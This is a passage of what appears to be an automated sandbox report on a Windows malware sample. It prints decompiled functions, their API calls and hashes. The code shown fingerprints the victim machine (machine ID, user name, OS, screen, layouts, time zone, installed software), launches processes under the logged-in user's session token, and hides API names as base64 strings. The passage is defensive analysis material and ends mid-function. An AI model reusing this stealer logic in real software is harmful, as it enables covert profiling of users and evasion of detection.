                                                                                                                                                                                            • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
                                                                                                                                                                                            • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
                                                                                                                                                                                          • Sleep.KERNEL32(00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ), ref: 004174CD
                                                                                                                                                                                          • Sleep.KERNEL32(00000001,004175A8,[Soft],?,00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ), ref: 004174EC
                                                                                                                                                                                            • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
                                                                                                                                                                                            • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
                                                                                                                                                                                            • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
                                                                                                                                                                                            • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8
                                                                                                                                                                                            • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
                                                                                                                                                                                          • String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
                                                                                                                                                                                          • API String ID: 75899496-943277980
                                                                                                                                                                                          • Opcode ID: c1c0bba0cf5750b68568b08facd4bf438261c5427543421f404452287209528a
                                                                                                                                                                                          • Instruction ID: 915cc31ebaf767ee9912e0c916b5d60c1651ad94c460c6a34579714c0f7d2b16
                                                                                                                                                                                          • Opcode Fuzzy Hash: c1c0bba0cf5750b68568b08facd4bf438261c5427543421f404452287209528a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A814E70A44209AFCB01FFA1CC42BCDBF7AAF49309F60407BB104B65D6D67D9A468B19
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00417290, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 201sleepCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 40%
                                                                                                                                                                                          			E00417290(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				intOrPtr* _t140;
				void* _t141;
				intOrPtr _t171;
				intOrPtr _t182;
				intOrPtr _t183;

				_t180 = __esi;
				_t179 = __edi;
				_t182 = _t183;
				_t141 = 0xc;
				do {
					_push(0);
					_push(0);
					_t141 = _t141 - 1;
					_t184 = _t141;
				} while (_t141 != 0);
				_t140 = __eax;
				_push(_t182);
				_push(0x41757c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t183;
				_push("MachineID :   ");
				E00406C4C( &_v8, __eax, __esi);
				_push(_v8);
				_push(0x4175a8);
				E00403850();
				_push( *_t140);
				_push("EXE_PATH  :   ");
				E00416F88(0,  &_v12);
				_push(_v12);
				_push(0x4175cc);
				E00403850();
				_push( *_t140);
				_push("Windows    :   ");
				E00407A4C( &_v28, _t140, __edi, __esi);
				_push(_v28);
				_push(0x4175f4);
				E00403850();
				E00403D2C( &_v20, _v24);
				_push(_v20);
				E004066C0( &_v32, _t184);
				_push(_v32);
				_push(0x4175fc);
				E00406BB4( &_v36);
				_push(_v36);
				_push(0x417604);
				E00403E1C();
				E0040377C(_t140, _v16);
				E004037DC( &_v48, "Computer(Username) :   ",  *_t140);
				E00403D2C( &_v44, _v48);
				_push(_v44);
				E00406610( &_v52);
				_push(_v52);
				_push(0x417630);
				E004065CC( &_v56);
				_push(_v56);
				_push(0x417638);
				_push(0x417604);
				E00403E1C();
				E0040377C(_t140, _v40);
				E004037DC( &_v68, "Screen: ",  *_t140);
				E00403D2C( &_v64, _v68);
				_push(_v64);
				E00406FDC(GetSystemMetrics(0), _t140,  &_v72, _t180, _t184);
				_push(_v72);
				_push(0x417654);
				E00406FDC(GetSystemMetrics(1), _t140,  &_v76, _t180, _t184);
				_push(_v76);
				_push(0x417604);
				E00403E1C();
				E0040377C(_t140, _v60);
				_push( *_t140);
				_push("Layouts: ");
				E00416FB8( &_v80, _t140, __edi, _t180);
				_push(_v80);
				_push(0x4175a8);
				E00403850();
				_push( *_t140);
				_push("LocalTime: ");
				E00417198( &_v84, _t140, _t180);
				_push(_v84);
				_push(0x4175a8);
				E00403850();
				_push( *_t140);
				_push("Zone: ");
				E00417098( &_v88, _t140, _t179, _t180, _t184);
				_push(_v88);
				_push(0x4175cc);
				E00403850();
				_push( *_t140);
				E00416748( &_v92, _t140, _t179, _t180);
				_push(_v92);
				_push(0x4175cc);
				E00403850();
				Sleep(1);
				_push( *_t140);
				E00416B94( &_v96, _t140, _t179, _t180, _t184);
				_push(_v96);
				_push(0x4175a8);
				_push(0x4175a8);
				E00403850();
				Sleep(1);
				_push( *_t140);
				_push("[Soft]");
				E00403850();
				Sleep(1);
				E00415F30( &_v100, _t140, _t179, _t180);
				E00403798(_t140, _v100);
				_t171 = 0x4175a8;
				 *[fs:eax] = _t171;
				_push(E00417583);
				E00403508( &_v100, 6);
				E00403B98( &_v76, 2);
				E004034E4( &_v68);
				E00403B98( &_v64, 4);
				E004034E4( &_v48);
				E00403B98( &_v44, 4);
				E00403508( &_v28, 2);
				E00403B98( &_v20, 2);
				return E00403508( &_v12, 2);
			}
































                                                                                                                                                                                          0x00417290
                                                                                                                                                                                          0x00417290
                                                                                                                                                                                          0x00417291
                                                                                                                                                                                          0x00417293
                                                                                                                                                                                          0x00417298
                                                                                                                                                                                          0x00417298
                                                                                                                                                                                          0x0041729a
                                                                                                                                                                                          0x0041729c
                                                                                                                                                                                          0x0041729c
                                                                                                                                                                                          0x0041729c
                                                                                                                                                                                          0x004172a0
                                                                                                                                                                                          0x004172a4
                                                                                                                                                                                          0x004172a5
                                                                                                                                                                                          0x004172aa
                                                                                                                                                                                          0x004172ad
                                                                                                                                                                                          0x004172b0
                                                                                                                                                                                          0x004172b8
                                                                                                                                                                                          0x004172bd
                                                                                                                                                                                          0x004172c0
                                                                                                                                                                                          0x004172cc
                                                                                                                                                                                          0x004172d1
                                                                                                                                                                                          0x004172d3
                                                                                                                                                                                          0x004172dd
                                                                                                                                                                                          0x004172e2
                                                                                                                                                                                          0x004172e5
                                                                                                                                                                                          0x004172f1
                                                                                                                                                                                          0x004172f6
                                                                                                                                                                                          0x004172f8
                                                                                                                                                                                          0x00417300
                                                                                                                                                                                          0x00417305
                                                                                                                                                                                          0x00417308
                                                                                                                                                                                          0x00417315
                                                                                                                                                                                          0x00417320
                                                                                                                                                                                          0x00417325
                                                                                                                                                                                          0x0041732b
                                                                                                                                                                                          0x00417330
                                                                                                                                                                                          0x00417333
                                                                                                                                                                                          0x0041733b
                                                                                                                                                                                          0x00417340
                                                                                                                                                                                          0x00417343
                                                                                                                                                                                          0x00417350
                                                                                                                                                                                          0x0041735a
                                                                                                                                                                                          0x00417369
                                                                                                                                                                                          0x00417374
                                                                                                                                                                                          0x00417379
                                                                                                                                                                                          0x0041737f
                                                                                                                                                                                          0x00417384
                                                                                                                                                                                          0x00417387
                                                                                                                                                                                          0x0041738f
                                                                                                                                                                                          0x00417394
                                                                                                                                                                                          0x00417397
                                                                                                                                                                                          0x0041739c
                                                                                                                                                                                          0x004173a9
                                                                                                                                                                                          0x004173b3
                                                                                                                                                                                          0x004173c2
                                                                                                                                                                                          0x004173cd
                                                                                                                                                                                          0x004173d2
                                                                                                                                                                                          0x004173df
                                                                                                                                                                                          0x004173e4
                                                                                                                                                                                          0x004173e7
                                                                                                                                                                                          0x004173f6
                                                                                                                                                                                          0x004173fb
                                                                                                                                                                                          0x004173fe
                                                                                                                                                                                          0x0041740b
                                                                                                                                                                                          0x00417415
                                                                                                                                                                                          0x0041741a
                                                                                                                                                                                          0x0041741c
                                                                                                                                                                                          0x00417424
                                                                                                                                                                                          0x00417429
                                                                                                                                                                                          0x0041742c
                                                                                                                                                                                          0x00417438
                                                                                                                                                                                          0x0041743d
                                                                                                                                                                                          0x0041743f
                                                                                                                                                                                          0x00417447
                                                                                                                                                                                          0x0041744c
                                                                                                                                                                                          0x0041744f
                                                                                                                                                                                          0x0041745b
                                                                                                                                                                                          0x00417460
                                                                                                                                                                                          0x00417462
                                                                                                                                                                                          0x0041746a
                                                                                                                                                                                          0x0041746f
                                                                                                                                                                                          0x00417472
                                                                                                                                                                                          0x0041747e
                                                                                                                                                                                          0x00417483
                                                                                                                                                                                          0x00417488
                                                                                                                                                                                          0x0041748d
                                                                                                                                                                                          0x00417490
                                                                                                                                                                                          0x0041749c
                                                                                                                                                                                          0x004174a3
                                                                                                                                                                                          0x004174a8
                                                                                                                                                                                          0x004174ad
                                                                                                                                                                                          0x004174b2
                                                                                                                                                                                          0x004174b5
                                                                                                                                                                                          0x004174ba
                                                                                                                                                                                          0x004174c6
                                                                                                                                                                                          0x004174cd
                                                                                                                                                                                          0x004174d2
                                                                                                                                                                                          0x004174d4
                                                                                                                                                                                          0x004174e5
                                                                                                                                                                                          0x004174ec
                                                                                                                                                                                          0x004174f4
                                                                                                                                                                                          0x004174fe
                                                                                                                                                                                          0x00417505
                                                                                                                                                                                          0x00417508
                                                                                                                                                                                          0x0041750b
                                                                                                                                                                                          0x00417518
                                                                                                                                                                                          0x00417525
                                                                                                                                                                                          0x0041752d
                                                                                                                                                                                          0x0041753a
                                                                                                                                                                                          0x00417542
                                                                                                                                                                                          0x0041754f
                                                                                                                                                                                          0x0041755c
                                                                                                                                                                                          0x00417569
                                                                                                                                                                                          0x0041757b

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 004173D7
                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 004173EE
                                                                                                                                                                                            • Part of subcall function 00416748: GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                                                                                                                                                                                          • Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ,?,004175A8,?,Layouts: ,?), ref: 004174A3
                                                                                                                                                                                            • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
                                                                                                                                                                                            • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
                                                                                                                                                                                            • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
                                                                                                                                                                                            • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
                                                                                                                                                                                            • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
                                                                                                                                                                                            • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
                                                                                                                                                                                          • Sleep.KERNEL32(00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ), ref: 004174CD
                                                                                                                                                                                          • Sleep.KERNEL32(00000001,004175A8,[Soft],?,00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ), ref: 004174EC
                                                                                                                                                                                            • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
                                                                                                                                                                                            • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
                                                                                                                                                                                            • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
                                                                                                                                                                                            • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8
                                                                                                                                                                                            • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
                                                                                                                                                                                          • String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
                                                                                                                                                                                          • API String ID: 75899496-943277980
                                                                                                                                                                                          • Opcode ID: dd72d902fec3c835ff41235e95e9197e7833cbbe4dd907cdafe0256d0d0e0796
                                                                                                                                                                                          • Instruction ID: 9ad36b54795493928cf4d7680a901020c7452f2e53798e9be21810986d7bb062
                                                                                                                                                                                          • Opcode Fuzzy Hash: dd72d902fec3c835ff41235e95e9197e7833cbbe4dd907cdafe0256d0d0e0796
                                                                                                                                                                                          • Instruction Fuzzy Hash: A2714E30A44109ABCF01FFD1CC42FCDBBBAAF48309F60407BB104B65D6D67DAA468A19
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00407DD0, Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 100libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 49%
                                                                                                                                                                                          			E00407DD0(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v36;
				intOrPtr _v100;
				char _v104;
				char _v108;
				char _v112;
				intOrPtr _v117;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t30;
				intOrPtr* _t61;
				intOrPtr _t74;
				intOrPtr* _t76;
				void* _t79;
				void* _t81;

				 *__eax =  *__eax + __eax;
				_v117 = _v117 + __edx;
				_v112 = 0;
				_v12 = 0;
				_v20 = 0;
				 *[fs:eax] = _t81 + 0xffffff98;
				_t28 = GetProcAddress(LoadLibraryA("kernel32.dll"), "WTSGetActiveConsoleSessionId");
				_t30 = GetProcAddress(LoadLibraryA("wtsapi32.dll"), "WTSQueryUserToken");
				_t76 = GetProcAddress(LoadLibraryA("userenv.dll"), "CreateEnvironmentBlock");
				E00402754(0,  &_v112);
				E00403D2C( &_v20, _v112);
				E00404F00();
				_v108 = 0x44;
				_v100 = 0;
				 *_t28( *[fs:eax], 0x407eea, _t81, __edi, __esi, __ebx, _t79, __ebx);
				_push( &_v16);
				_push(0);
				if( *_t30() != 0) {
					 *_t76( &_v20, _v12, 0xffffffff);
					_t61 =  *0x41b5e8; // 0x41c728
					 *((intOrPtr*)( *_t61))(_v12, E00403D3C(_v16), E00403D3C(_v8), 0, 0, 0, 0x400, _v20, 0,  &_v104,  &_v36);
					asm("sbb eax, eax");
				}
				_pop(_t74);
				 *[fs:eax] = _t74;
				_push(E00407EF1);
				E004034E4( &_v108);
				E00403B80( &_v16);
				return E00403B80( &_v8);
			}




















                                                                                                                                                                                          0x00407dd1
                                                                                                                                                                                          0x00407dd3
                                                                                                                                                                                          0x00407ddf
                                                                                                                                                                                          0x00407de2
                                                                                                                                                                                          0x00407de5
                                                                                                                                                                                          0x00407df3
                                                                                                                                                                                          0x00407e06
                                                                                                                                                                                          0x00407e1d
                                                                                                                                                                                          0x00407e39
                                                                                                                                                                                          0x00407e40
                                                                                                                                                                                          0x00407e4b
                                                                                                                                                                                          0x00407e58
                                                                                                                                                                                          0x00407e5d
                                                                                                                                                                                          0x00407e66
                                                                                                                                                                                          0x00407e69
                                                                                                                                                                                          0x00407e70
                                                                                                                                                                                          0x00407e71
                                                                                                                                                                                          0x00407e76
                                                                                                                                                                                          0x00407e82
                                                                                                                                                                                          0x00407eb3
                                                                                                                                                                                          0x00407eba
                                                                                                                                                                                          0x00407ebf
                                                                                                                                                                                          0x00407ec2
                                                                                                                                                                                          0x00407ec6
                                                                                                                                                                                          0x00407ec9
                                                                                                                                                                                          0x00407ecc
                                                                                                                                                                                          0x00407ed4
                                                                                                                                                                                          0x00407edc
                                                                                                                                                                                          0x00407ee9

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E00
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407E06
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E17
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,wtsapi32.dll), ref: 00407E1D
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(userenv.dll,CreateEnvironmentBlock,00000000,wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E2E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,userenv.dll), ref: 00407E34
                                                                                                                                                                                            • Part of subcall function 00402754: GetModuleFileNameA.KERNEL32(00000000,?,00000105,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402778
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressLibraryLoadProc$FileModuleName
                                                                                                                                                                                          • String ID: CreateEnvironmentBlock$D$WTSGetActiveConsoleSessionId$WTSQueryUserToken$kernel32.dll$userenv.dll$wtsapi32.dll
                                                                                                                                                                                          • API String ID: 2206896924-1825016774
                                                                                                                                                                                          • Opcode ID: 7f96db7897a1f98cdf8b59428a73a971fc0080a3a05c1da7105613a8313ce1c2
                                                                                                                                                                                          • Instruction ID: 099c1664e0e1cd81917be229cd1a82c6e96495822271a1ae00088806601eb9d9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f96db7897a1f98cdf8b59428a73a971fc0080a3a05c1da7105613a8313ce1c2
                                                                                                                                                                                          • Instruction Fuzzy Hash: C2312BB1A443086EDB00EBB5CC42E9E7BBCAB48754F200576F504F72C1DA78AE058A68
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00407DD4, Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 98libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 48%
                                                                                                                                                                                          			E00407DD4(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v36;
				intOrPtr _v96;
				char _v104;
				char _v108;
				_Unknown_base(*)()* _t25;
				_Unknown_base(*)()* _t27;
				intOrPtr* _t58;
				intOrPtr _t71;
				intOrPtr* _t73;
				void* _t76;
				void* _t78;

				_v108 = 0;
				_v8 = 0;
				_v16 = 0;
				 *[fs:eax] = _t78 + 0xffffff98;
				_t25 = GetProcAddress(LoadLibraryA("kernel32.dll"), "WTSGetActiveConsoleSessionId");
				_t27 = GetProcAddress(LoadLibraryA("wtsapi32.dll"), "WTSQueryUserToken");
				_t73 = GetProcAddress(LoadLibraryA("userenv.dll"), "CreateEnvironmentBlock");
				E00402754(0,  &_v108);
				E00403D2C( &_v16, _v108);
				E00404F00();
				_v104 = 0x44;
				_v96 = 0;
				 *_t25( *[fs:eax], 0x407eea, _t78, __edi, __esi, __ebx, _t76);
				_push( &_v12);
				_push(0);
				if( *_t27() != 0) {
					 *_t73( &_v20, _v12, 0xffffffff);
					_t58 =  *0x41b5e8; // 0x41c728
					 *((intOrPtr*)( *_t58))(_v12, E00403D3C(_v16), E00403D3C(_v8), 0, 0, 0, 0x400, _v20, 0,  &_v104,  &_v36);
					asm("sbb eax, eax");
				}
				_pop(_t71);
				 *[fs:eax] = _t71;
				_push(E00407EF1);
				E004034E4( &_v108);
				E00403B80( &_v16);
				return E00403B80( &_v8);
			}


















                                                                                                                                                                                          0x00407ddf
                                                                                                                                                                                          0x00407de2
                                                                                                                                                                                          0x00407de5
                                                                                                                                                                                          0x00407df3
                                                                                                                                                                                          0x00407e06
                                                                                                                                                                                          0x00407e1d
                                                                                                                                                                                          0x00407e39
                                                                                                                                                                                          0x00407e40
                                                                                                                                                                                          0x00407e4b
                                                                                                                                                                                          0x00407e58
                                                                                                                                                                                          0x00407e5d
                                                                                                                                                                                          0x00407e66
                                                                                                                                                                                          0x00407e69
                                                                                                                                                                                          0x00407e70
                                                                                                                                                                                          0x00407e71
                                                                                                                                                                                          0x00407e76
                                                                                                                                                                                          0x00407e82
                                                                                                                                                                                          0x00407eb3
                                                                                                                                                                                          0x00407eba
                                                                                                                                                                                          0x00407ebf
                                                                                                                                                                                          0x00407ec2
                                                                                                                                                                                          0x00407ec6
                                                                                                                                                                                          0x00407ec9
                                                                                                                                                                                          0x00407ecc
                                                                                                                                                                                          0x00407ed4
                                                                                                                                                                                          0x00407edc
                                                                                                                                                                                          0x00407ee9

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E00
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407E06
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E17
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,wtsapi32.dll), ref: 00407E1D
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(userenv.dll,CreateEnvironmentBlock,00000000,wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E2E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,userenv.dll), ref: 00407E34
                                                                                                                                                                                            • Part of subcall function 00402754: GetModuleFileNameA.KERNEL32(00000000,?,00000105,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402778
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressLibraryLoadProc$FileModuleName
                                                                                                                                                                                          • String ID: CreateEnvironmentBlock$D$WTSGetActiveConsoleSessionId$WTSQueryUserToken$kernel32.dll$userenv.dll$wtsapi32.dll
                                                                                                                                                                                          • API String ID: 2206896924-1825016774
                                                                                                                                                                                          • Opcode ID: 27f1b7fea490fa65aef81c43b6e31d3605ad6563d7a28bf75364900d2bc4d32e
                                                                                                                                                                                          • Instruction ID: f930562a739e9fb19de45fac1d58899ce59ec74f5e2b45b4c14d1fb7312bbdc9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 27f1b7fea490fa65aef81c43b6e31d3605ad6563d7a28bf75364900d2bc4d32e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 28312EB1E443096EDB00EBB5CC42E9E7BFCAB48754F200576F514F72C1DA78AE058A58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00416B94, Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 225libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 71%
                                                                                                                                                                                          			E00416B94(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				long _v12;
				intOrPtr _v16;
				char _v17;
				char _v24;
				char _v28;
				char _v584;
				char _v588;
				char _v592;
				char _v596;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				CHAR* _t113;
				CHAR* _t119;
				CHAR* _t125;
				void* _t137;
				void* _t141;
				void* _t169;
				signed int _t170;
				void* _t171;
				intOrPtr* _t174;
				signed int _t183;
				intOrPtr* _t192;
				void* _t193;
				signed int _t194;
				signed int _t195;
				intOrPtr _t214;
				intOrPtr _t216;
				signed int _t229;
				intOrPtr* _t239;
				signed int _t240;
				signed int _t242;
				void* _t243;
				void* _t244;
				void* _t246;
				intOrPtr _t247;

				_t238 = __esi;
				_t245 = _t246;
				_t247 = _t246 + 0xfffffda0;
				_v612 = 0;
				_v608 = 0;
				_v604 = 0;
				_v596 = 0;
				_v600 = 0;
				_v592 = 0;
				_v588 = 0;
				_v8 = 0;
				_v24 = 0;
				_v16 = __eax;
				 *[fs:eax] = _t247;
				E00406984("Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90", __ebx,  &_v588, __edi, __esi);
				_t113 = E00403990(_v588);
				_t192 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t113);
				E00406984("UHJvY2VzczMyRmlyc3RX", _t192,  &_v592, __edi, __esi);
				_t119 = E00403990(_v592);
				_t235 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t119);
				E00406984("UHJvY2VzczMyTmV4dFc=", _t192,  &_v596, _t235, __esi);
				_t125 = E00403990(_v596);
				E00406984("a2VybmVsMzIuZGxs", _t192,  &_v600, _t235, _t238);
				_t239 = GetProcAddress(LoadLibraryA(E00403990(_v600)), _t125);
				E004034E4(_v16);
				_t193 =  *_t192(2, 0,  *[fs:eax], 0x416eca, _t246, __edi, __esi, __ebx, _t244);
				if(_t193 != 0xffffffff) {
					_v584 = 0x22c;
					_push( &_v584);
					_push(_t193);
					if( *_t235() != 0) {
						do {
							_push(E004045EC(_v8) + 1);
							E004047A8();
							_t183 = E004045EC(_v8);
							_t243 =  &_v584;
							memcpy(_v8 + _t183 * 0x8b * 4 - 0x22c, _t243, 0x8b << 2);
							_t247 = _t247 + 0x10;
							_t235 = _t243 + 0x116;
							_t239 = _t239;
							 *((intOrPtr*)(_v8 + E004045EC(_v8) * 0x8b * 4 - 0x20c)) = 0;
							_push( &_v584);
							_push(_t193);
						} while ( *_t239() != 0);
					}
					_t174 =  *0x41b57c; // 0x41c690
					 *((intOrPtr*)( *_t174))(_t193);
				}
				_t137 = E004045EC(_v8) - 1;
				if(_t137 >= 0) {
					_v28 = _t137 + 1;
					_t195 = 0;
					do {
						_v17 = 1;
						_t169 = E004045EC(_v8) - 1;
						if(_t169 >= 0) {
							_t171 = _t169 + 1;
							_t229 = 0;
							do {
								_t43 = _t195 * 0x8b * 4; // 0x0
								_t242 = _t229 * 0x8b;
								_t235 = _v8;
								_t47 = _t242 * 4; // 0x1ffff
								if( *((intOrPtr*)(_v8 + _t43 + 0x18)) ==  *((intOrPtr*)(_v8 + _t47 + 8))) {
									_v17 = 0;
								}
								_t229 = _t229 + 1;
								_t171 = _t171 - 1;
							} while (_t171 != 0);
						}
						_t170 = _t195 * 0x8b;
						_t52 = _t170 * 4; // 0x0
						_t56 = _t170 * 4; // 0x1ffff
						if( *((intOrPtr*)(_v8 + _t52 + 0x18)) ==  *((intOrPtr*)(_v8 + _t56 + 8))) {
							_v17 = 1;
						}
						if(_v17 == 1) {
							 *((intOrPtr*)(_v8 + 0x20 + _t170 * 4)) = 1;
						}
						_t195 = _t195 + 1;
						_t64 =  &_v28;
						 *_t64 = _v28 - 1;
					} while ( *_t64 != 0);
				}
				_v12 = GetCurrentProcessId();
				_t141 = E004045EC(_v8) - 1;
				if(_t141 >= 0) {
					_v28 = _t141 + 1;
					_t194 = 0;
					do {
						_t240 = _t194 * 0x8b;
						if( *((intOrPtr*)(_v8 + 0x20 + _t240 * 4)) == 1) {
							_t75 = _t240 * 4; // 0x1ffff
							if( *((intOrPtr*)(_v8 + _t75 + 8)) != _v12) {
								_push(_v24);
